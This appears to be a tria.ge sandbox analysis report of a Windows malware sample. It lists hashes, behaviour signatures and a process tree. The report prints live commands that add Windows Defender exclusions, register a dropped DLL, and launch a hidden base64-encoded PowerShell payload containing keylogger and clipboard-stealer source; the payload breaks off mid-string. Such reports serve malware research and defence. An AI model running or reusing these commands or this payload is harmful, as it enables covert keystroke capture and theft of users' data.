Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/06/2024, 20:32

General

  • Target

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe

  • Size

    428KB

  • MD5

    2a90a7ccf98e12ba57583e1e012eca18

  • SHA1

    66512ffb8c58d1444622ff64f189cd7db7dbde1d

  • SHA256

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8

  • SHA512

    b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5

  • SSDEEP

    6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
    "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3224
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3140
      • C:\Windows\SysWOW64\wscript.exe
        wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
        3⤵
        • Checks computer location settings
        • Deletes itself
        • Modifies registry class
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4820
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:5104
  • C:\Windows\SysWOW64\wscript.exe
    C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\715f25e70.js" 76
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Modifies registry class
    PID:1784
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGgAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpADMAIABhADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAbwA2ACAAagA3ACAAPQAgAHAAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAawA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABsADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGkAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABrADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAG8AMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABqADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGIAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABsADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAG8AMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGQAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGsAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGwAMQAwACAAYwAzADUAKQB7AGcAMQAxACAAPQAgAGMAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGMAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AG8AMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGMAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAagAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGIAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAbAAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAaAAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGwAMgA0ACkAOwBpAGYAIAAoAGgAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABsADIANAApADsAZQAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAGUAMgA3ACkAIAAhAD0AIAAwACkAIABlADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBrADEAOAAgAD0AIAAiACIAOwBvADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAG8AMQAzACkAOwBmADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbwAxADMALAAgAGYAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAaQAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbwAxADMALAAgAHIAZQBmACAAaQAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGkAMQA0ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAagA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAawA5ACAAPQAgAGkAMwA5ACgAYQA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAawA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQAzADkAKABpADMAIABhADQAKQB7AEkAbgB0AFAAdAByACAAZAA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGEANAAsACAAZAA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAG4ANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYANAAyACwAIABzAHQAcgBpAG4AZwAgAGYANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAagA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABuADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBuADQANQBkAGEAdABhAF8AIAA9ACAAbgA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAZgA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGYANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAGoANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIABuADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGEANAA2ACgASQBuAHQAUAB0AHIAIABnADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABnADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABpADMAKABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABvADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABsADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGoANQAoAGkAbgB0ACAAbgA0ADgALAAgAEkAbgB0AFAAdAByACAAZgA0ADkALAAgAEkAbgB0AFAAdAByACAAbgA1ADAAKQB7AGkAZgAgACgAbgA0ADgAIAA+AD0AIAAwACAAJgAmACAAZgA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAZQA1ADEAIAA9ACAAYQA0ADYAKABuADUAMAApADsAaQBmACAAKABlADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGsAOQAsACAAbgA0ADgALAAgAGYANAA5ACwAIABuADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAGEANQAyACAAPQAgACgAZQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAZAA1ADMAIAA9ACAAKABlADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGcANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGcANQA1ACkAKQB7AHUAaQBuAHQAIABqADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAZQA1ADEALAAgADMAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGUANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAaQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABsADEAMgAsACAAcgBlAGYAIABlADUANwApADsAdQBpAG4AdAAgAGgANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGkANQA4ACkAOwBpAGYAIAAoAGEANQAyACAAfAB8ACAAZAA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGUANQAxACwAIABqADUANgAsACAAZwA1ADUALAAgAGoANQA0ACwAIABqADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAaAA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbAAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAZQA1ADcAIAAhAD0AIABpADEANAApACAAfAB8ACAAKABsADEAMgAgACEAPQAgAG8AMQAzACkAIAB8AHwAIAAoAGYAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBuADQAMQAoAGYAMQA2ACwAIABhADIANQAsACAAZQAxADcAKQA7AGYAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANgAuAEwAZQBuAGcAdABoACkAOwBmADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGUAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABlADEANwAuAEwAZQBuAGcAdABoACkAOwBvADEAMwAgAD0AIABsADEAMgA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGUANQA3ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBpADEANAAgAD0AIABlADUANwA7AH0AaQBmACAAKABlADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAGEANQAyACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABkADUAMwApACAAZQAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABlADEANwAuAEEAcABwAGUAbgBkACgAagA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABrADkALAAgAG4ANAA4ACwAIABmADQAOQAsACAAbgA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABqADYAMAAoAGIAeQB0AGUAWwBdACAAagA2ADEAKQB7AHMAdAByAGkAbgBnACAAbwA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABqADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABvADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKAApADsAcgBlAHQAdQByAG4AIABuAGUAdwAgAEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACgAbwA2ADIALgBTAHAAbABpAHQAKABuAGUAdwAgAGMAaABhAHIAWwBdACAAewAgACcAXAAwACcAIAB9ACwAIABTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwAuAFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAHAAOAAoAEkAbgB0AFAAdAByACAAbQA2ADMAKQB7AGIAbwBvAGwAIABlADYANAAgAD0AIAB0AHIAdQBlADsAcwB0AHIAaQBuAGcAIABtADYANQA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABqADYANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAdwBoAGkAbABlACAAKABlADYANAApAHsAcwB0AHIAaQBuAGcAIABrADYANwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABvADIAMAAsACAAYgAyADMALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGkAZgAgACgAawA2ADcAIAAhAD0AIAAiACIAKQB7AFIAZQBnAGkAcwB0AHIAeQBLAGUAeQAgAGkANgA4ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKABjADEAOQAsACAAdAByAHUAZQApADsAaQBmACAAKABpADYAOAAgACEAPQAgAG4AdQBsAGwAKQB7AGkANgA4AC4ARABlAGwAZQB0AGUAVgBhAGwAdQBlACgAYgAyADMAKQA7AGkANgA4AC4AQwBsAG8AcwBlACgAKQA7AH0ARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAfQBpAGYAIAAoAEMAbABpAHAAYgBvAGEAcgBkAC4AQwBvAG4AdABhAGkAbgBzAFQAZQB4AHQAKAApACAAPQA9ACAAdAByAHUAZQApAHsAbQA2ADUAIAA9ACAAQwBsAGkAcABiAG8AYQByAGQALgBHAGUAdABUAGUAeAB0ACgAKQA7AGkAZgAgACgAbQA2ADUAIAAhAD0AIABrADEAOAApAHsAcwB0AHIAaQBuAGcAIABlADYAOQAgAD0AIAAiACIAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAbQA3ADAAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBmACAAKABsADEAMgAgACEAPQAgADAAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBtADcAMAAuAEMAYQBwAGEAYwBpAHQAeQAgAD0AIABtADMANwAgACsAIAAxADsARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdAAoAGwAMQAyACwAIABtADcAMAAsACAAbQAzADcAIAArACAAMQApADsAdQBpAG4AdAAgAF8AcAByAG8AYwBfAGkAZABfACAAPQAgADAAOwBpAGYAIAAoAEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbAAxADIALAAgAHIAZQBmACAAXwBwAHIAbwBjAF8AaQBkAF8AKQAgACEAPQAgADAAKQB7AFAAcgBvAGMAZQBzAHMAIABiADcAMQAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAF8AcAByAG8AYwBfAGkAZABfACkAOwBpAGYAIAAoAGIANwAxACAAIQA9ACAAbgB1AGwAbAApACAAZQA2ADkAIAA9ACAAYgA3ADEALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwB9AH0AbQA3ADAALgBBAHAAcABlAG4AZAAoACIAIAA6ADoAIABDAGwAaQBwAGIAbwBhAHIAZAAiACkAOwBqADYANgAuAFIAZQBtAG8AdgBlACgAMAAsACAAagA2ADYALgBMAGUAbgBnAHQAaAApADsAagA2ADYALgBBAHAAcABlAG4AZAAoAG0ANgA1ACkAOwBuADQAMQAoAG0ANwAwACwAIABlADYAOQAsACAAagA2ADYAKQA7AGsAMQA4ACAAPQAgAG0ANgA1ADsAfQB9AHMAdAByAGkAbgBnACAAZAA3ADIAIAA9ACAAIgAiADsAbwAyADgAIABsADcAMwA7AGkAZgAgACgAZQAyADcAIAAhAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQB7AHUAaQBuAHQAIABnADcANAAgAD0AIAAxADAAMAAwADAAOwBiAHkAdABlAFsAXQAgAGUANwA1ACAAPQAgAG4AZQB3ACAAYgB5AHQAZQBbAGcANwA0AF0AOwBpAGYAIAAoAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABlADIANwAsACAAbgB1AGwAbAAsACAAZQA3ADUALAAgAG8AdQB0ACAAZwA3ADQAKQAgAD0APQAgADAAKQB7AEwAaQBzAHQAPABzAHQAcgBpAG